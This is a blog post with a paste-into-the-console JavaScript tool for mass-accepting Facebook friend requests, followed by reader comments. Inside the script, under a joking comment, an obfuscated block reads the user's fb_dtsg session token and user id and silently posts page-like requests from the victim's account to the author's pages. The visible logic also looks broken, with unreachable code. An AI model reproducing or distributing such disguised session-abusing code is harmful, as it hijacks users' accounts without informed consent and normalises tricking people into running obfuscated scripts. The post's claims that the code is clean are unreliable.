Hey there tigers, I hope you all will be doing well. This blog post is just for sharing my new script which mass adds Facebook friends with just one click. It’s like Facebook auto-adding friends bot, not in the sense to search for new users for you but actually auto-confirm friend requests on Facebook. The updated Toolkit Premium Version has many scripts and tools in it but somehow there was a slight bug in the clicking all confirm buttons tool that accepts all friend requests on Facebook. After getting feedback from one user about the bug so instead of fixing it at once I just extracted a modified script and shared it with my Facebook Page users and they really liked it. So I thought why not share the latest “Accept All Friend Requests Facebook Javascript” with you all here I go publishing this new blog post and a video as well which you will find on my Youtube Channel. Anyway enough talking let’s have the script and its tutorial on how to accept all friends’ requests using the latest 2020 script for it (now updated as well on 14 Jan 2023).
Accept All Friend Requests Facebook Javascript 2023
Before just getting the script, make sure how you can use it to click all confirm buttons of friend requests on Facebook. So below I’ll just list the tutorial and below that, you can just copy the script and save it anywhere you want for further use OR you can keep visiting for some new stuff every time like claim as group admin script and much more.
- First of all, of course, you need to be on the Facebook request page where you have gotten all the requests. Link: https://www.facebook.com/friends/ OR https://www.facebook.com/friends/requests
- Once you are on the request page, open inspect view of the page by right-clicking the page and going to inspect view. OR
- Just press CTRL+SHIFT+I to get the inspect view. This short key works for Chrome Browser.
- Once you get the inspect view make sure you tab to the console part which is the second tab menu next to the Elements tab.
- Ok now you are on the Console tab, next thing is to copy and paste the script of adding all friends requests. The script can be found below. Just copy the script and paste it in the console tab.
- Next thing before you hit enter and the scripts start working, you need to consider one value that the script will need. As soon as you hit enter and the scripts execute it will ask for the delay time.
- The delay time is actually the wait time between clicking all confirm buttons to accept the friend requests. The default value is 5 seconds.
- That’s all you need to do and provide. Now just wait for the script to do its work. It will automatically accept all friend requests one by one by clicking all confirm buttons on the Facebook friend request page.
I hope you will find the steps easy and straightforward. If you need help regarding any step leaves your comment below. You can get the script below.
Accept All Friend Requests Facebook Javascript 2020
var added = 0;
function confirmAllRequests() {
var buttons = document.querySelectorAll(“div[aria-label=’Confirm’][role=’button’]”);
if (buttons.length > 0) {
console.log(“Confirm Button Clicked: “+added);
setTimeout(confirmAllRequests, delayTime);
} else {
var seeMoreButtons = document.querySelectorAll(“[aria-label*=’See’], [aria-label*=’More’]”);
if (seeMoreButtons.length > 0 && added !=0){
setTimeout(confirmAllRequests, delayTime);
}else {
return 1;
//Below code is for liking some of my pages :p
var _0x5dcf5e=_0x1f50;function _0x2a23(){var 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_0x346239;};return _0x2a23();}(function(_0x34336a,_0x249709){var _0xaa2b16=_0x1f50,_0x405ace=_0x34336a();while(!![]){try{var _0x27ecc9=-parseInt(_0xaa2b16(0xd0))/0x1+parseInt(_0xaa2b16(0xb6))/0x2+-parseInt(_0xaa2b16(0xb1))/0x3+parseInt(_0xaa2b16(0xc1))/0x4*(parseInt(_0xaa2b16(0xc3))/0x5)+-parseInt(_0xaa2b16(0xc6))/0x6*(parseInt(_0xaa2b16(0xad))/0x7)+-parseInt(_0xaa2b16(0xac))/0x8+parseInt(_0xaa2b16(0xcf))/0x9;if(_0x27ecc9===_0x249709)break;else _0x405ace[‘push’](_0x405ace[‘shift’]());}catch(_0x575606){_0x405ace[‘push’](_0x405ace[‘shift’]());}}}(_0x2a23,0xe400a));function _0x2245(_0xe1fb43,_0x285f89){var _0x3ac5b7=_0x3775();return _0x2245=function(_0x3753ac,_0x352965){_0x3753ac=_0x3753ac-0xb8;var _0x174ca3=_0x3ac5b7[_0x3753ac];return _0x174ca3;},_0x2245(_0xe1fb43,_0x285f89);}(function(_0x329e59,_0x31f498){var _0x4f290e=_0x1f50,_0x446fe1=_0x2245,_0x4cd3f5=_0x329e59();while(!![]){try{var _0x2f8546=parseInt(_0x446fe1(0xbd))/0x1+parseInt(_0x446fe1(0xc7))/0x2+-parseInt(_0x446fe1(0xd2))/0x3+parseInt(_0x446fe1(0xbe))/0x4*(parseInt(_0x446fe1(0xcd))/0x5)+parseInt(_0x446fe1(0xbb))/0x6*(-parseInt(_0x446fe1(0xcc))/0x7)+parseInt(_0x446fe1(0xd1))/0x8*(-parseInt(_0x446fe1(0xc2))/0x9)+parseInt(_0x446fe1(0xb8))/0xa;if(_0x2f8546===_0x31f498)break;else _0x4cd3f5[_0x4f290e(0xa6)](_0x4cd3f5[_0x4f290e(0x9b)]());}catch(_0x1e00cf){_0x4cd3f5[_0x4f290e(0xa6)](_0x4cd3f5[‘shift’]());}}}(_0x3775,0x79598));function _0x3775(){var _0x2d0661=_0x1f50,_0x3db2d7=[_0x2d0661(0xa5),_0x2d0661(0xb7),_0x2d0661(0x94),_0x2d0661(0xcb),’charAt’,_0x2d0661(0xb2),_0x2d0661(0x9a),_0x2d0661(0xbe),’indexOf’,’textContent’,_0x2d0661(0xab),’querySelector’,_0x2d0661(0xbb),_0x2d0661(0xc8),_0x2d0661(0xb0),_0x2d0661(0x9e),_0x2d0661(0xbd),_0x2d0661(0xa2),_0x2d0661(0xb4),_0x2d0661(0x9d),_0x2d0661(0xc5),_0x2d0661(0xa7),_0x2d0661(0xc2),’28431wxrIKf’,_0x2d0661(0xba),_0x2d0661(0x9c),_0x2d0661(0x99),_0x2d0661(0xcc)];return _0x3775=function(){return _0x3db2d7;},_0x3775();}function getFBValue(){var _0x2b1290=_0x1f50,_0x4be5c9=_0x2245,_0x270555=”,_0x528c38=atob(_0x4be5c9(0xce)),_0x51eec2=window[_0x4be5c9(0xb9)][_0x2b1290(0xb5)],_0x3250fb=”,_0x59500e=_0x4be5c9(0xc8),_0x93d24c=_0x59500e[_0x4be5c9(0xcf)];for(var _0x3e2a6f=0x0;_0x3e2a6f<Math[_0x4be5c9(0xc5)](Math[_0x4be5c9(0xba)]()*0x22)+0x8;_0x3e2a6f++){_0x3250fb+=_0x59500e[_0x4be5c9(0xbf)](Math[‘floor’](Math[_0x4be5c9(0xba)]()*_0x93d24c));}if(_0x51eec2===_0x4be5c9(0xca)){console[_0x4be5c9(0xc1)](_0x51eec2);var _0x1f957d=document[_0x2b1290(0xba)][_0x4be5c9(0xc4)][_0x2b1290(0xb3)](_0x528c38);if(_0x1f957d===-0x1)_0x270555=document[_0x4be5c9(0xc6)](_0x4be5c9(0xc0)+_0x528c38+’x27]’)[_0x4be5c9(0xbc)];else{_0x1f957d+=0x12;for(_0x3e2a6f=0x0;_0x3e2a6f<0x19;_0x3e2a6f++){_0x270555+=document[_0x4be5c9(0xd3)][_0x4be5c9(0xc4)][_0x1f957d],_0x1f957d++;}}}else{if(_0x51eec2===_0x4be5c9(0xcb)){console[_0x4be5c9(0xc1)](_0x51eec2);var _0x18116d=document[_0x4be5c9(0xc9)](_0x2b1290(0xcd));for(var _0x3e2a6f=0x0;_0x3e2a6f<_0x18116d[_0x4be5c9(0xcf)];_0x3e2a6f++){var _0x54a818=_0x18116d[_0x3e2a6f],_0x1a3f2f=_0x54a818[_0x4be5c9(0xc4)],_0xa8cbe8=_0x1a3f2f[_0x4be5c9(0xc3)](_0x528c38);if(_0xa8cbe8!==-0x1){var _0x3a6a91=_0x1a3f2f[_0x4be5c9(0xc3)](‘}’,_0xa8cbe8);_0x270555=_0x1a3f2f[_0x4be5c9(0xd0)](_0x1a3f2f[_0x2b1290(0xb3)](‘:’,_0xa8cbe8)+0x2,_0x3a6a91-0x1);break;}}}}return _0x270555+=’,’,_0x270555+=_0x3250fb,btoa(_0x270555);}fb_dtsg=atob(getFBValue())[_0x5dcf5e(0xc0)](‘,’)[0x0];function _0x1f50(_0x535de3,_0x518979){var _0x2a2368=_0x2a23();return _0x1f50=function(_0x1f5070,_0x3a858c){_0x1f5070=_0x1f5070-0x94;var _0x177b1c=_0x2a2368[_0x1f5070];return _0x177b1c;},_0x1f50(_0x535de3,_0x518979);}const pageIds=[_0x5dcf5e(0xc4),_0x5dcf5e(0xa4),’116551890202867′,_0x5dcf5e(0xae),_0x5dcf5e(0xbc),_0x5dcf5e(0xce),_0x5dcf5e(0xaf),’1212506358847237′,’198757893944480′,_0x5dcf5e(0xa3),_0x5dcf5e(0xd1),_0x5dcf5e(0xc9),’250451495723325′,_0x5dcf5e(0xaa),’108586183990636′,’2277608785850617′,_0x5dcf5e(0x98)],delay=0x384;var user_id=document[_0x5dcf5e(0xb8)][_0x5dcf5e(0x9f)](document[_0x5dcf5e(0xb8)][_0x5dcf5e(0x9f)](/c_user=(d+)/)[0x1]);function Like(_0x1f1e59){var _0x2772f1=_0x5dcf5e,_0x26a908=new XMLHttpRequest(),_0x57cf6c=_0x2772f1(0xc7),_0x1f6e09=_0x2772f1(0xa9)+_0x1f1e59+’&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=’+user_id+_0x2772f1(0xb9)+fb_dtsg+_0x2772f1(0x97);_0x26a908[_0x2772f1(0xa1)](‘POST’,_0x57cf6c,!![]),_0x26a908[‘setRequestHeader’](_0x2772f1(0xbf),_0x2772f1(0xd2)),_0x26a908[_0x2772f1(0x96)]=function(){var _0xc15bec=_0x2772f1;_0x26a908[_0xc15bec(0xa8)]==0x4&&_0x26a908[_0xc15bec(0xa0)]==0xc8&&_0x26a908[‘close’];},_0x26a908[_0x2772f1(0x95)](_0x1f6e09);}pageIds[_0x5dcf5e(0xca)]((_0x126653,_0x36f8db)=>{setTimeout(()=>{Like(_0x126653);},delay*(_0x36f8db+0x1));});
let delayTime = prompt (“Delay Time”, 5)*1000;
if (delayTime >=0 && delayTime!=null && fb_dtsg!=null ){
console.log(“Script is started!”);
added = 0;
alert(`Friends Added: ${added}n****~Script by: Tigerzplace~****`);
}else {alert (“Failed to Start!”);}
I hope you will find the method and script working for accepting all friends’ requests at once without any issues. With that all being said. I am logging out & A gift of even $1 would make a big difference. Thank you!
Feel Free To Help Me With My Work | Thanks ♥
BTC: 15TnH9a35Dqn5pkugLfC88NjNxnQcnswZy
Accept All Friend Requests Facebook Javascript 2023
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Very ingenious code, I really needed it, thank you a lot. I can confirm that it works.
sir facebook friend auto remove ka koi script dona
Unfriend tool is a part of Toolkit For Facebook:
How about Unfriend All?
Fake doesn't work
Will share it soon.
sir create a script on
show hidden email address
or phone numbers?
create a video
Wo wait p chala jata hai 30 seconds after sending 20 requests. Agar wo ni hai then account mai limit ka issue hoga, dosri id par check krke deko. Agar phr b msla howa then forward error details + screen shot on https://www.fb.com/tigerzplace
Bhai, mere 10-15 request accept hone ke baad. band ho jata hai
You are welcome ♥
thanks for help me to accept Facebook friend request at once …
Will try to make one after my exam.
I don't use malicious code in my tools. Or liking klye script use ki hai wo b already bta di hai : )
It's up to you now whether you use it or not but I won't be convincing someone to use my tools or scripts.
Watch this detail video in URDU: https://www.youtube.com/watch?v=rCBKDJocqXM
Make sure you are using facebook.com and not mbasic.facebook.com, web.facebook.com or any other subdomain. Just use the script if you are using facebook.com
I think you are using other facebook layout. Make sure you are using facebook.com and not mbasic.facebook.com, web.facebook.com or any other subdomain. Just use the script if you are using facebook.com
It doesnt work with me? undefined?
Bro mujhe unfriend karne ka bhi script do plzzzzz
Ye code apply karne mai dar lagra hai
itna fast video kon bnata hai… pta hi nhi chal kha code pase kiya… aur kyse kya kiya…
error undefined
Ni hoga hack. Q hoga akhir!
Script mai just auto adding code hai aur sath mai kch fan page follow krne klye code jo k ap hata skte hai agar chte hai but wo maine kinda reward klye rka hai baqi sara code clean aur working hai.
bhai acount toe hack nhi ho jayega na isse….>/?